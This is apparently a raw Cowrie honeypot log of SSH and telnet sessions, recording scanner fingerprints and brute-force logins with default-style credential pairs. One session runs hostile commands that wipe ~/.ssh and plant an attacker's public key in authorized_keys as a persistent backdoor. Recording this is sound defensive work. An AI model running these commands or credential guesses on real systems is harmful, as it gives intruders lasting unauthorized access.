{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.840514Z","src_ip":"212.227.235.229","session":"1bb9039f61a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60314,"dst_ip":"1.2.3.4","dst_port":22,"session":"86f4cb89dc36","protocol":"ssh","message":"New connection: 212.227.235.229:60314 (1.2.3.4:22) [session: 86f4cb89dc36]","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.873742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.875560Z","src_ip":"212.227.235.229","session":"86f4cb89dc36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38226,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f14ae35b00","protocol":"ssh","message":"New connection: 212.227.235.229:38226 (1.2.3.4:22) [session: 95f14ae35b00]","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.945822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:35.947099Z","src_ip":"212.227.235.229","session":"95f14ae35b00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:36.050830Z","src_ip":"212.227.235.229","session":"95f14ae35b00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:36.098585Z","src_ip":"212.227.235.229","session":"86f4cb89dc36"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:34:36.557547Z","src_ip":"212.227.235.229","session":"95f14ae35b00"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:36.664053Z","src_ip":"212.227.235.229","session":"b1e53de12f6e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:36.665331Z","src_ip":"212.227.235.229","session":"95f14ae35b00"}
{"eventid":"cowrie.session.closed","duration":12.789618015289307,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:37.015436Z","src_ip":"212.227.125.160","session":"ce1f0f338c53"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:34:37.016567Z","src_ip":"212.227.235.229","session":"86f4cb89dc36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21059,"dst_ip":"1.2.3.4","dst_port":23,"session":"3783e530e358","protocol":"telnet","message":"New connection: 212.227.125.160:21059 (1.2.3.4:23) [session: 3783e530e358]","sensor":"my-vps","timestamp":"2025-09-08T13:34:37.250717Z"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:38.249730Z","src_ip":"212.227.235.229","session":"86f4cb89dc36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32808,"dst_ip":"1.2.3.4","dst_port":22,"session":"37c2185efca0","protocol":"ssh","message":"New connection: 212.227.235.229:32808 (1.2.3.4:22) [session: 37c2185efca0]","sensor":"my-vps","timestamp":"2025-09-08T13:34:38.472752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:38.479184Z","src_ip":"212.227.235.229","session":"37c2185efca0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:38.706490Z","src_ip":"212.227.235.229","session":"37c2185efca0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:34:40.263605Z","src_ip":"212.227.235.229","session":"37c2185efca0"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:40.489189Z","src_ip":"212.227.235.229","session":"37c2185efca0"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:40.490199Z","src_ip":"212.227.235.229","session":"b19a9f06f4f5"}
{"eventid":"cowrie.session.closed","duration":12.743229150772095,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:41.716429Z","src_ip":"212.227.235.229","session":"5d62518d139e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35013,"dst_ip":"1.2.3.4","dst_port":23,"session":"54fa9d0d3bde","protocol":"telnet","message":"New connection: 212.227.235.229:35013 (1.2.3.4:23) [session: 54fa9d0d3bde]","sensor":"my-vps","timestamp":"2025-09-08T13:34:41.951979Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48736,"dst_ip":"1.2.3.4","dst_port":22,"session":"9625867bfaf5","protocol":"ssh","message":"New connection: 212.227.235.229:48736 (1.2.3.4:22) [session: 9625867bfaf5]","sensor":"my-vps","timestamp":"2025-09-08T13:34:42.339277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:42.340106Z","src_ip":"212.227.235.229","session":"9625867bfaf5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:42.469693Z","src_ip":"212.227.235.229","session":"9625867bfaf5"}
{"eventid":"cowrie.login.failed","username":"share","password":"share123","message":"login attempt [share/share123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:34:43.024110Z","src_ip":"212.227.235.229","session":"9625867bfaf5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:44.155571Z","src_ip":"212.227.235.229","session":"9625867bfaf5"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":16517,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea5e48304987","protocol":"ssh","message":"New connection: 49.247.35.31:16517 (1.2.3.4:22) [session: ea5e48304987]","sensor":"my-vps","timestamp":"2025-09-08T13:34:44.964833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:44.993991Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:45.276452Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":46930,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef18af16be74","protocol":"ssh","message":"New connection: 134.199.174.250:46930 (1.2.3.4:22) [session: ef18af16be74]","sensor":"my-vps","timestamp":"2025-09-08T13:34:45.736076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:34:45.794233Z","src_ip":"134.199.174.250","session":"ef18af16be74"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:34:46.097195Z","src_ip":"134.199.174.250","session":"ef18af16be74"}
{"eventid":"cowrie.login.success","username":"root","password":"vps@123","message":"login attempt [root/vps@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:34:46.454922Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:34:47.102040Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:34:47.102754Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:34:47.104036Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:47.399310Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123abc","message":"login attempt [administrator/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:34:47.637894Z","src_ip":"134.199.174.250","session":"ef18af16be74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:34:47.991681Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:34:47.992387Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:34:48.294260Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:48.295121Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":24654,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe61e87de7c5","protocol":"ssh","message":"New connection: 49.247.35.31:24654 (1.2.3.4:22) [session: fe61e87de7c5]","sensor":"my-vps","timestamp":"2025-09-08T13:34:48.576631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:48.582301Z","src_ip":"49.247.35.31","session":"fe61e87de7c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:48.878473Z","src_ip":"49.247.35.31","session":"fe61e87de7c5"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:49.053920Z","src_ip":"134.199.174.250","session":"ef18af16be74"}
{"eventid":"cowrie.session.closed","duration":12.716768503189087,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:49.967394Z","src_ip":"212.227.125.160","session":"3783e530e358"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:34:50.022337Z","src_ip":"49.247.35.31","session":"fe61e87de7c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":22458,"dst_ip":"1.2.3.4","dst_port":23,"session":"84d615a51a7a","protocol":"telnet","message":"New connection: 212.227.125.160:22458 (1.2.3.4:23) [session: 84d615a51a7a]","sensor":"my-vps","timestamp":"2025-09-08T13:34:50.184523Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:51.336605Z","src_ip":"49.247.35.31","session":"fe61e87de7c5"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":29415,"dst_ip":"1.2.3.4","dst_port":22,"session":"01a6e78a0c8e","protocol":"ssh","message":"New connection: 49.247.35.31:29415 (1.2.3.4:22) [session: 01a6e78a0c8e]","sensor":"my-vps","timestamp":"2025-09-08T13:34:51.618862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:34:51.633566Z","src_ip":"49.247.35.31","session":"01a6e78a0c8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:34:51.916072Z","src_ip":"49.247.35.31","session":"01a6e78a0c8e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:34:53.080350Z","src_ip":"49.247.35.31","session":"01a6e78a0c8e"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:53.380978Z","src_ip":"49.247.35.31","session":"ea5e48304987"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:53.381992Z","src_ip":"49.247.35.31","session":"01a6e78a0c8e"}
{"eventid":"cowrie.session.closed","duration":12.673122644424438,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:34:54.625036Z","src_ip":"212.227.235.229","session":"54fa9d0d3bde"}
